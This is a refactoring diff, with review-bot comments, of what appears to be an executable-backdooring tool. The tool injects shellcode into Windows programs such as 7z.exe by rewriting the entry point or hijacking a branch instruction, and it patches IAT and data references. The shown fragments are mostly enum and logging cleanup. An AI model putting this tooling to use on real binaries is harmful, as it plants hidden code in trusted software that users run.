refactor: cleanup 3
+1
-5
@@ -48,11 +48,7 @@ def inject():
|
|||||||
settings.exec_style = ExecStyle[exec_style]
|
settings.exec_style = ExecStyle[exec_style]
|
||||||
|
|
||||||
inject_style = request.form['inject_style']
|
inject_style = request.form['inject_style']
|
||||||
inject_style = InjectStyle[inject_style]
|
settings.inject_style = InjectStyle[inject_style]
|
||||||
if inject_style == InjectStyle.ENTRY:
|
|
||||||
settings.inject_mode = 1
|
|
||||||
elif inject_style == InjectStyle.HIJACK:
|
|
||||||
settings.inject_mode = 2
|
|
||||||
|
|
||||||
print(str(settings))
|
print(str(settings))
|
||||||
start(settings)
|
start(settings)
|
||||||
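Review bot: The new line `settings.inject_style = InjectStyle[inject_style]` writes a field nothing else in this commit reads — the Settings hunk declares `inject_mode: InjectStyle` and inject_exe reads `settings.inject_mode`, which this hunk no longer sets, so the value chosen in the form is silently ignored and the default mode is always used. Change it to `settings.inject_mode = InjectStyle[inject_style]`. Because the enum members are renamed in the same commit (ENTRY/HIJACK → ChangeEntryPoint/BackdoorCallInstr), the form's option values presumably need the same rename, otherwise the name lookup raises KeyError on every submission; that lookup on a raw form value is unchanged from before and still surfaces as an unhandled exception for any unknown value. inject() continues past the hunk.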
|
|||||||
@@ -13,21 +13,16 @@ import logging
|
|||||||
|
|
||||||
from helper import hexdump
|
from helper import hexdump
|
||||||
from derbackdoorer.mype import MyPe
|
from derbackdoorer.mype import MyPe
|
||||||
|
from model.defs import *
|
||||||
|
|
||||||
logger = logging.getLogger("DerBackdoorer")
|
logger = logging.getLogger("DerBackdoorer")
|
||||||
|
|
||||||
|
|
||||||
class PeBackdoor:
|
class PeBackdoor:
|
||||||
class SupportedRunModes(IntEnum):
|
def __init__(self, mype: MyPe, main_shc: bytes, inject_mode: InjectStyle):
|
||||||
ModifyOEP = 1
|
|
||||||
BackdoorEP = 2
|
|
||||||
HijackExport = 4
|
|
||||||
|
|
||||||
|
|
||||||
def __init__(self, mype: MyPe, main_shc, inject_mode):
|
|
||||||
self.mype: MyPe = mype
|
self.mype: MyPe = mype
|
||||||
self.runMode = inject_mode
|
self.runMode: InjectStyle = inject_mode
|
||||||
self.shellcodeData = main_shc
|
self.shellcodeData: bytes = main_shc
|
||||||
|
|
||||||
# Working
|
# Working
|
||||||
self.shellcodeOffset: int = 0 # from start of the file
|
self.shellcodeOffset: int = 0 # from start of the file
|
||||||
@@ -77,22 +72,22 @@ Trailing {sect_name} bytes:
|
|||||||
|
|
||||||
|
|
||||||
def setupShellcodeEntryPoint(self):
|
def setupShellcodeEntryPoint(self):
|
||||||
if self.runMode == int(PeBackdoor.SupportedRunModes.ModifyOEP):
|
if self.runMode == InjectStyle.ChangeEntryPoint:
|
||||||
rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset)
|
rva = self.mype.pe.get_rva_from_offset(self.shellcodeOffset)
|
||||||
self.mype.set_entrypoint(rva)
|
self.mype.set_entrypoint(rva)
|
||||||
|
|
||||||
logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
|
logger.info(f'Address Of Entry Point changed to: RVA 0x{rva:x}')
|
||||||
return True
|
return True
|
||||||
|
|
||||||
elif self.runMode == int(PeBackdoor.SupportedRunModes.BackdoorEP):
|
elif self.runMode == InjectStyle.BackdoorCallInstr:
|
||||||
return self.backdoorEntryPoint()
|
return self.backdoorEntryPoint()
|
||||||
|
|
||||||
elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
|
#elif self.runMode == int(PeBackdoor.SupportedRunModes.HijackExport):
|
||||||
addr = self.getExportEntryPoint()
|
# addr = self.getExportEntryPoint()
|
||||||
if addr == -1:
|
# if addr == -1:
|
||||||
logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')
|
# logger.critical('Could not find any export entry point to hijack! Specify existing DLL Exported function with -e/--export!')
|
||||||
|
#
|
||||||
return self.backdoorEntryPoint(addr)
|
# return self.backdoorEntryPoint(addr)
|
||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
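Review bot: The HijackExport branch of setupShellcodeEntryPoint is left as five commented-out lines instead of being deleted, and with it gone the method falls through to `return False` for any unhandled runMode without saying why. Remove the commented block (history keeps it) and make the fallthrough explicit: `else:` / `logger.error(f"Unsupported inject mode: {self.runMode}")` ahead of `return False`. The comparisons now assume runMode is an InjectStyle member rather than the old int; the `__init__` annotation in the earlier hunk says so, but nothing enforces it, so an int passed by an older caller would silently take the False path.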
@@ -250,7 +245,7 @@ Trailing {sect_name} bytes:
|
|||||||
self.compiledTrampoline = encoding
|
self.compiledTrampoline = encoding
|
||||||
self.compiledTrampolineCount = count
|
self.compiledTrampolineCount = count
|
||||||
|
|
||||||
logger.info('Successfully backdoored entry point with jump/call to shellcode.\n')
|
logger.info('Successfully backdoored entry point with jump/call to shellcode')
|
||||||
return instr.address
|
return instr.address
|
||||||
|
|
||||||
return 0
|
return 0
|
||||||
|
|||||||
@@ -56,13 +56,11 @@ class MyPe():
|
|||||||
|
|
||||||
def get_code_section_data(self) -> bytes:
|
def get_code_section_data(self) -> bytes:
|
||||||
sect = self.get_code_section()
|
sect = self.get_code_section()
|
||||||
print("CODE GET: {}".format(len(sect.get_data())))
|
|
||||||
return bytes(sect.get_data())
|
return bytes(sect.get_data())
|
||||||
|
|
||||||
|
|
||||||
def write_code_section_data(self, data: bytes):
|
def write_code_section_data(self, data: bytes):
|
||||||
sect = self.get_code_section()
|
sect = self.get_code_section()
|
||||||
print("CODE SET {} {}".format(len(data), sect.PointerToRawData))
|
|
||||||
self.pe.set_bytes_at_offset(sect.PointerToRawData, data)
|
self.pe.set_bytes_at_offset(sect.PointerToRawData, data)
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
+3
-2
@@ -27,9 +27,10 @@ class ExecStyle(Enum):
|
|||||||
class DataRefStyle(Enum):
|
class DataRefStyle(Enum):
|
||||||
APPEND = 1
|
APPEND = 1
|
||||||
|
|
||||||
|
|
||||||
class InjectStyle(Enum):
|
class InjectStyle(Enum):
|
||||||
ENTRY = "change AddressOfEntryPoint"
|
ChangeEntryPoint = "change AddressOfEntryPoint"
|
||||||
HIJACK = "hijack branching instruction at Original Entry Point (jmp, call, ...)"
|
BackdoorCallInstr = "hijack branching instruction at Original Entry Point (jmp, call, ...)"
|
||||||
|
|
||||||
class SourceStyle(Enum):
|
class SourceStyle(Enum):
|
||||||
peb_walk = "peb_walk"
|
peb_walk = "peb_walk"
|
||||||
|
|||||||
+1
-1
@@ -14,7 +14,7 @@ class Settings():
|
|||||||
self.short_call_patching: bool = False
|
self.short_call_patching: bool = False
|
||||||
|
|
||||||
# Injectable
|
# Injectable
|
||||||
self.inject_mode: int = 2
|
self.inject_mode: InjectStyle = InjectStyle.BackdoorCallInstr
|
||||||
self.inject_exe_in: FilePath = ""
|
self.inject_exe_in: FilePath = ""
|
||||||
self.inject_exe_out: FilePath = ""
|
self.inject_exe_out: FilePath = ""
|
||||||
|
|
||||||
|
|||||||
+3
-4
@@ -26,8 +26,8 @@ def inject_exe(
|
|||||||
shellcode_in = project.payload.payload_path
|
shellcode_in = project.payload.payload_path
|
||||||
exe_in = settings.inject_exe_in
|
exe_in = settings.inject_exe_in
|
||||||
exe_out = settings.inject_exe_out
|
exe_out = settings.inject_exe_out
|
||||||
inject_mode = settings.inject_mode
|
inject_mode: InjectStyle = settings.inject_mode
|
||||||
source_style = settings.source_style
|
source_style: SourceStyle = settings.source_style
|
||||||
|
|
||||||
logger.info("--[ Injecting: {} into: {} -> {} (mode: {})".format(
|
logger.info("--[ Injecting: {} into: {} -> {} (mode: {})".format(
|
||||||
shellcode_in, exe_in, exe_out, inject_mode
|
shellcode_in, exe_in, exe_out, inject_mode
|
||||||
@@ -92,7 +92,7 @@ def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
|
|||||||
offset_from_code = code.index(iatRequest.placeholder)
|
offset_from_code = code.index(iatRequest.placeholder)
|
||||||
instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr
|
instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_virtaddr
|
||||||
logger.info(" Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
|
logger.info(" Replace {} at VA 0x{:x} with call to IAT at VA 0x{:x}".format(
|
||||||
iatRequest.placeholder, instruction_virtual_address, destination_virtual_address
|
iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address
|
||||||
))
|
))
|
||||||
jmp = assemble_and_disassemble_jump(
|
jmp = assemble_and_disassemble_jump(
|
||||||
instruction_virtual_address, destination_virtual_address
|
instruction_virtual_address, destination_virtual_address
|
||||||
@@ -124,7 +124,6 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
|
|||||||
# patch code section
|
# patch code section
|
||||||
# replace the placeholder with a LEA instruction to the data we written above
|
# replace the placeholder with a LEA instruction to the data we written above
|
||||||
code = mype.get_code_section_data()
|
code = mype.get_code_section_data()
|
||||||
print("Type of code: ", type(code))
|
|
||||||
for datareuse_fixup in reusedata_fixups:
|
for datareuse_fixup in reusedata_fixups:
|
||||||
if not datareuse_fixup.randbytes in code:
|
if not datareuse_fixup.randbytes in code:
|
||||||
raise Exception("DataResuse: ID {} not found, abort".format(
|
raise Exception("DataResuse: ID {} not found, abort".format(
|
||||||
|
|||||||
+6
-3
@@ -1,9 +1,12 @@
|
|||||||
import re
|
import re
|
||||||
import os
|
import os
|
||||||
|
import logging
|
||||||
|
|
||||||
|
logger = logging.getLogger("masmshc")
|
||||||
|
|
||||||
VERSION = "0.3"
|
|
||||||
g_is32bit = False
|
g_is32bit = False
|
||||||
|
|
||||||
|
|
||||||
class Params:
|
class Params:
|
||||||
def __init__(self, infile, outfile, inline_strings, remove_crt, append_rsp_stub):
|
def __init__(self, infile, outfile, inline_strings, remove_crt, append_rsp_stub):
|
||||||
self.infile = infile
|
self.infile = infile
|
||||||
@@ -116,10 +119,10 @@ def process_file(params):
|
|||||||
# ofile.write("\tjmp\tmain\n")
|
# ofile.write("\tjmp\tmain\n")
|
||||||
elif params.append_rsp_stub:
|
elif params.append_rsp_stub:
|
||||||
append_align_rsp(ofile)
|
append_align_rsp(ofile)
|
||||||
print("[INFO] Entry Point: AlignRSP")
|
logger.debug("[INFO] Entry Point: AlignRSP")
|
||||||
|
|
||||||
if seg_name == "_BSS":
|
if seg_name == "_BSS":
|
||||||
print(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n")
|
logger.error(f"[ERROR] Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!\n")
|
||||||
|
|
||||||
if seg_name in ("pdata", "xdata", "voltbl"):
|
if seg_name in ("pdata", "xdata", "voltbl"):
|
||||||
in_skipped = True
|
in_skipped = True
|
||||||
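Review bot: The two messages converted in process_file keep the hand-written `[INFO]`/`[ERROR]` prefixes and the trailing `\n` from the print era, which a logging formatter would already supply, and the AlignRSP line drops from an always-printed message to DEBUG level. Suggested: `logger.info("Entry Point: AlignRSP")` and `logger.error(f"Line {line_count + 1}: _BSS segment detected! Remove all global and static variables!")`. Unless the caller configures logging, Python's last-resort handler emits only WARNING and above, so the DEBUG message would not be visible at all — worth confirming against the entry point. process_file starts and ends outside the hunk.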
|
|||||||
+9
-7
@@ -58,17 +58,17 @@ def main():
|
|||||||
|
|
||||||
if args.verify == "peb":
|
if args.verify == "peb":
|
||||||
settings.source_style = SourceStyle.peb_walk
|
settings.source_style = SourceStyle.peb_walk
|
||||||
settings.inject_mode = 2
|
settings.inject_mode = InjectStyle.BackdoorCallInstr
|
||||||
settings.inject_exe_in = "exes/7z.exe"
|
settings.inject_exe_in = "exes/7z.exe"
|
||||||
settings.inject_exe_out = "out/7z-verify.exe"
|
settings.inject_exe_out = "out/7z-verify.exe"
|
||||||
elif args.verify == "iat":
|
elif args.verify == "iat":
|
||||||
settings.source_style = SourceStyle.iat_reuse
|
settings.source_style = SourceStyle.iat_reuse
|
||||||
settings.inject_mode = 2
|
settings.inject_mode = InjectStyle.BackdoorCallInstr
|
||||||
settings.inject_exe_in = "exes/procexp64.exe"
|
settings.inject_exe_in = "exes/procexp64.exe"
|
||||||
settings.inject_exe_out = "out/procexp64-verify.exe"
|
settings.inject_exe_out = "out/procexp64-verify.exe"
|
||||||
elif args.verify == "rwx":
|
elif args.verify == "rwx":
|
||||||
settings.source_style = SourceStyle.peb_walk
|
settings.source_style = SourceStyle.peb_walk
|
||||||
settings.inject_mode = 1 # ,2 is broken atm
|
settings.inject_mode = InjectStyle.ChangeEntryPoint # ,2 is broken atm
|
||||||
settings.inject_exe_in = "exes/wifiinfoview.exe"
|
settings.inject_exe_in = "exes/wifiinfoview.exe"
|
||||||
settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
|
settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
|
||||||
else:
|
else:
|
||||||
@@ -101,12 +101,14 @@ def main():
|
|||||||
if args.exec == "direct_1":
|
if args.exec == "direct_1":
|
||||||
settings.exec_style = ExecStyle.CALL
|
settings.exec_style = ExecStyle.CALL
|
||||||
|
|
||||||
if args.rbrunmode:
|
if args.inject:
|
||||||
if args.rbrunmode == "1" or args.rbrunmode == "2":
|
if args.rbrunmode == "eop":
|
||||||
settings.inject_mode = int(args.rbrunmode)
|
settings.inject_mode = InjectStyle.ChangeEntryPoint
|
||||||
|
elif args.rbrunmode == "backdoor":
|
||||||
|
settings.inject_mode = InjectStyle.BackdoorCallInstr
|
||||||
else:
|
else:
|
||||||
logging.error("Invalid mode, use one of:")
|
logging.error("Invalid mode, use one of:")
|
||||||
for i in ["1", "2"]:
|
for i in ["eop", "backdoor"]:
|
||||||
logging.error(" {} {}".format(i, rbrunmode_str(i)))
|
logging.error(" {} {}".format(i, rbrunmode_str(i)))
|
||||||
return
|
return
|
||||||
|
|
||||||
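Review bot: The new mode dispatch in main() spells the valid names twice — in the `if`/`elif` chain and again in the `["eop", "backdoor"]` list of the error message — so the two can drift apart; a single dict lookup keeps them in one place. The outer guard also changed from `if args.rbrunmode:` to `if args.inject:`, so an inject run that omits the mode option now reaches the `else` branch and returns instead of keeping the Settings default (BackdoorCallInstr), assuming argparse leaves it as None; if that is intended, the error text should say the option is required. `rbrunmode_str` is called with the new string values and presumably needs updating to match; it is outside this diff. main() continues past the hunk.
```python
if args.inject:
    inject_modes = {
        "eop": InjectStyle.ChangeEntryPoint,
        "backdoor": InjectStyle.BackdoorCallInstr,
    }
    if args.rbrunmode not in inject_modes:
        logging.error("Invalid mode, use one of:")
        for name in inject_modes:
            logging.error(" {} {}".format(name, rbrunmode_str(name)))
        return
    settings.inject_mode = inject_modes[args.rbrunmode]
# … unchanged: rest of main() …
```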
|
|||||||